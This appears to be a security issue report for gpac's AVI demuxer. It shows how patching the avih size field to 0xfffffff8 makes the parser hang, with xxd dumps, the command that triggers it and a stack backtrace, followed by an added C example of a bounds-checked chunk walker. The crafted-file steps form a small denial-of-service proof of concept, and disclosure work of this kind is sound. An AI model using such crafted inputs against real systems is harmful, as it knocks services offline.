An infinite loop security issue in gpac/gpac
The issue occurs in src/media_tools/avilib.c#L1974, when the gpac avidmx filter parses an AVI file.
Take a simple AVI file; its header looks as follows in xxd mode:
$ xxd ./1.avi | head -n 2
00000000: 5249 4646 e81b 0100 4156 4920 4c49 5354 RIFF....AVI LIST
00000010: c222 0000 6864 726c 6176 6968 3800 0000 ."..hdrlavih8...
Use vim in xxd mode to change the header's size field (the 4 bytes after "avih") to 0xfffffff8 (-8 as a signed int); the modified data is as follows:
$ xxd ./1.avi| head -n 2
00000000: 5249 4646 e81b 0100 4156 4920 4c49 5354 RIFF....AVI LIST
00000010: c222 0000 6864 726c 6176 6968 f8ff ffff ."..hdrlavih....
Then run the following command with the avidmx filter; you will observe an infinite loop:
./gpac -i ./1.avi -o 123 avidmx
Its stack backtrace is as follows:
#0 __strncasecmp_l_avx () at ../sysdeps/x86_64/multiarch/strcmp-sse42.S:166
#1 0x00007ffff7a5c62c in avi_parse_input_file.part () from /mnt/data/gpac/gpac-32/bin/gcc/libgpac.so.11
#2 0x00007ffff7a5e9f7 in AVI_open_input_file () from /mnt/data/gpac/gpac-32/bin/gcc/libgpac.so.11
#3 0x00007ffff7bf11d9 in avidmx_process () from /mnt/data/gpac/gpac-32/bin/gcc/libgpac.so.11
#4 0x00007ffff7baced0 in gf_filter_process_task () from /mnt/data/gpac/gpac-32/bin/gcc/libgpac.so.11
#5 0x00007ffff7b9abc4 in gf_fs_thread_proc () from /mnt/data/gpac/gpac-32/bin/gcc/libgpac.so.11
#6 0x00007ffff7b9fb2b in gf_fs_run () from /mnt/data/gpac/gpac-32/bin/gcc/libgpac.so.11
#7 0x0000555555564a5a in gpac_main ()
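The defect behind this report is a chunk size field that is trusted as a length: read into a signed int, 0xfffffff8 is -8, so a cursor that advances by 8 + size never moves. The following is an added example, not gpac's code or its fix, showing the bound check a RIFF chunk walker needs before advancing; the sample bytes are constructed inline to mirror the dump above and the function names (build_sample, walk_hdrl, check_sample) are made up for illustration.

```c
#include <stdint.h>
#include <string.h>

/* RIFF/AVI size fields are little-endian 32-bit values. */
static uint32_t rd_le32(const unsigned char *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}
static void wr_le32(unsigned char *p, uint32_t v) {
    p[0] = v & 0xff; p[1] = (v >> 8) & 0xff; p[2] = (v >> 16) & 0xff; p[3] = (v >> 24) & 0xff;
}

#define AVIH_BODY 0x38u                          /* avih payload length, as in the dump */
#define SAMPLE_LEN (12 + 12 + 8 + AVIH_BODY)     /* RIFF hdr + LIST hdr + avih chunk */

/* Constructed sample (not a real file): RIFF/AVI header and a LIST hdrl that
 * holds one avih chunk. With corrupt != 0 the avih size becomes 0xfffffff8. */
size_t build_sample(unsigned char *out, int corrupt) {
    memset(out, 0, SAMPLE_LEN);
    memcpy(out, "RIFF", 4);      wr_le32(out + 4, SAMPLE_LEN - 8);     memcpy(out + 8, "AVI ", 4);
    memcpy(out + 12, "LIST", 4); wr_le32(out + 16, 4 + 8 + AVIH_BODY); memcpy(out + 20, "hdrl", 4);
    memcpy(out + 24, "avih", 4); wr_le32(out + 28, corrupt ? 0xfffffff8u : AVIH_BODY);
    return SAMPLE_LEN;
}
/* Walk the chunks inside the hdrl LIST. Returns the number of chunks visited,
 * or -1 when a size field does not fit the bytes that remain. The bound check
 * is the point: 0xfffffff8 read into a signed int is -8, so a cursor that does
 * i += 8 + n never moves and a loop that trusts the field never terminates. */
int walk_hdrl(const unsigned char *buf, size_t len) {
    if (len < 24 || memcmp(buf, "RIFF", 4) || memcmp(buf + 8, "AVI ", 4) ||
        memcmp(buf + 12, "LIST", 4) || memcmp(buf + 20, "hdrl", 4)) return -1;
    uint32_t list_size = rd_le32(buf + 16);
    if (list_size < 4 || list_size - 4 > len - 24) return -1;    /* LIST body must fit in file */
    size_t off = 24, end = 24 + (list_size - 4);
    int count = 0;
    while (off + 8 <= end) {
        uint32_t size = rd_le32(buf + off + 4);
        size_t avail = end - (off + 8);
        /* chunks are padded to even length; reject anything that would overrun */
        if (size > avail || (size_t)size + (size & 1u) > avail) return -1;
        off += 8 + size + (size & 1u);
        count++;
    }
    return count;
}
/* Parse a freshly built sample: 1 for the clean file, -1 for the corrupted one. */
int check_sample(int corrupt) {
    unsigned char buf[SAMPLE_LEN];
    return walk_hdrl(buf, build_sample(buf, corrupt));
}
```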